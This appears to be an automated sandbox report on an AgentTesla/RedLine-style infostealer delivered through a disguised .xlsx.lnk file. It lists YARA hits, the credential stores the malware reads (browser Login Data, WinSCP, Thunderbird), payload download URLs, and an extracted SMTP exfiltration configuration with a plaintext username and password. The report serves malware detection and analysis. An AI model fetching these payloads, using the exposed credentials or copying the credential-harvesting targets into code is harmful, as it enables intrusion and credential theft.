Source: Yara match	File source: 27.2.bwsiuvcU.pif.40350000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.409c0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3dad5566.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.26fc9b90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.40350f08.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.25dd5566.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3ed89b90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3ede6478.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.bwsiuvcU.pif.3bdc99c8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.bwsiuvcU.pif.3bdc99c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.1680345757.000000003DA95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1682459055.00000000409C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1787983024.0000000025D95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2555827704.0000000040350000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1791650361.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2556241672.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.1719620200.000000003BD8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.1516343993.000000003BDC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2554498447.000000003DA65000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1681909755.0000000040260000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.1634916828.0000000023FF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1681582310.000000003EDE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2555544877.000000003ED31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1792368001.0000000028C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1790805820.0000000026F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 23.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.1639938993.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000001.1624046151.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1732584170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.1494437975.000000007EB10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1639938993.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1732584170.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000001.1707928386.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2524457336.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1519434101.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2524457336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000001.1494452738.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2524457336.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000001.1624046151.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000001.1624046151.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000001.1494452738.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000001.1707928386.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000001.1707928386.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1732584170.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

Tries to harvest and steal ftp login credentials

Source: C:\Users\Public\Libraries\bwsiuvcU.pif

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Yara detected Credential Stealer

Source: Yara match	File source: 00000017.00000002.1680679015.000000003DDE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1788431061.0000000025F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2554879629.000000003DD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: bwsiuvcU.pif PID: 6340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bwsiuvcU.pif PID: 2196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bwsiuvcU.pif PID: 2324, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 00000019.00000002.1788431061.0000000025FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1680679015.000000003DE32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2554879629.000000003DD81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1680679015.000000003DDE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1680679015.000000003DE5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1788431061.0000000025FEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1788431061.0000000025F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2554879629.000000003DDAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2554879629.000000003DD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: bwsiuvcU.pif PID: 6340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bwsiuvcU.pif PID: 2196, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bwsiuvcU.pif PID: 2324, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 27.3.bwsiuvcU.pif.3bd8fed0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3ede5570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.26fc9b90.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.284a0f08.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.40260000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3daa5566.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3dad5566.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3ee39b90.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.409b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3ed35570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.284a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3daa5566.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.26f76478.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.40260000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.3.bwsiuvcU.pif.3bd8fed0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3daa646e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.40350000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3dad646e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3daa646e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3ed35570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.26f75570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3ede5570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.25dd646e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.28c40000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3ede6478.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.28c40000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3ed36478.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.40260f08.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3ed36478.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3ed89b90.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.26f75570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.25dd646e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.284a0f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.25dd5566.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.284a0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.40350f08.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.409c0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.26f76478.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.409b0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.40350000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.409c0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3dad5566.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.26fc9b90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.40350f08.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.25dd5566.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.3ed89b90.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.3ede6478.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.bwsiuvcU.pif.3bdc99c8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.bwsiuvcU.pif.3bdc99c8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.1680345757.000000003DA95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1682459055.00000000409C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1787983024.0000000025D95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2555827704.0000000040350000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1791650361.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2556241672.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.1719620200.000000003BD8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.1516343993.000000003BDC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2554498447.000000003DA65000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1681909755.0000000040260000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.1634916828.0000000023FF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1681582310.000000003EDE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2555544877.000000003ED31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1792368001.0000000028C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1790805820.0000000026F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 23.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.1.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.bwsiuvcU.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.1.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.bwsiuvcU.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.1639938993.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000001.1624046151.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1732584170.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.1494437975.000000007EB10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1639938993.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1732584170.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000001.1707928386.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2524457336.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1519434101.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2524457336.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000001.1494452738.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2524457336.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000001.1624046151.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000001.1624046151.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000001.1494452738.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000001.1707928386.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.1639938993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000001.1707928386.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1732584170.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.107.139.11	dual-spov-0006.spov-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
192.185.124.132	mail.irmaklarpaslanmaz.com.tr	United States	46606	UNIFIEDLAYER-AS-1US	true
89.46.106.29	sessosesso.it	Italy	31034	ARUBA-ASNIT	true

Private

IP
127.0.0.1

Contacted Domains

Name	IP	Active
sessosesso.it	89.46.106.29	true
dual-spov-0006.spov-msedge.net	13.107.139.11	true
www.sessosesso.it	89.46.106.29	true
mail.irmaklarpaslanmaz.com.tr	192.185.124.132	true
zyupsq.by.files.1drv.com	unknown	unknown
onedrive.live.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.sessosesso.it/assets/aw/uc.exe	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://onedrive.live.com/download?resid=849ABDB14CA5CEC3%21220&authkey=!AGW69_d3Nli6r4Y	false		high
https://www.sessosesso.it/assets/aw/yt.hta	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://sessosesso.it/assets/aw/Book1.xlsx	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: FT. 40FE CNY .xlsx.lnk

Avira: detected

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: https://www.sessosesso.it/assets/aw/uc.exe	Avira URL Cloud: Label: malware

Found malware configuration

Source: cmd.exe.5360.20.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.irmaklarpaslanmaz.com.trB", "Username": "muhasebe@irmaklarpaslanmaz.com.tr", "Password": "MH5473588PmZ&"}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	ReversingLabs: Detection: 58%
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Virustotal: Detection: 38%	Perma Link
Source: C:\Users\Public\Libraries\netutils.dll	ReversingLabs: Detection: 28%
Source: C:\Users\Public\Libraries\netutils.dll	Virustotal: Detection: 47%	Perma Link
Source: C:\Users\user\AppData\Roaming\uc.exe	ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Roaming\uc.exe	Virustotal: Detection: 38%	Perma Link

Multi AV Scanner detection for submitted file

Source: FT. 40FE CNY .xlsx.lnk	ReversingLabs: Detection: 31%
Source: FT. 40FE CNY .xlsx.lnk	Virustotal: Detection: 24%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\uc.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: FT. 40FE CNY .xlsx.lnk

Joe Sandbox ML: detected

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Unpacked PE file: 23.2.bwsiuvcU.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Unpacked PE file: 25.2.bwsiuvcU.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Unpacked PE file: 27.2.bwsiuvcU.pif.400000.0.unpack

Source: unknown	HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 89.46.106.29:443 -> 192.168.2.7:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.7:49716 version: TLS 1.2

Source:	Binary string: calc.pdbGCTL source: mshta.exe, 00000009.00000003.1852414679.0000019AC1771000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1855006902.000001A2C46D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852363981.000001A2C46CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852558870.000001A2C46E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852439079.000001A2C46DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851615477.000001A2C4722000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852067245.000001A2C4393000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865516494.000001A2C46F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852507533.000001A2C4710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852261324.000001A2C46D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852234112.000001A2C438F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851691454.000001A2C438D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1853065476.000001A2C46E5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865380060.000001A2C46D1000.00000004.00000020.00020000.00000000.sdmp, yt[1].hta.9.dr
Source:	Binary string: PSReadline.pdbaK source: powershell.exe, 00000011.00000002.1635136687.0000029E326E4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000011.00000002.1629294581.0000029E323A0000.00000004.00000020.00020000.00000000.sdmp
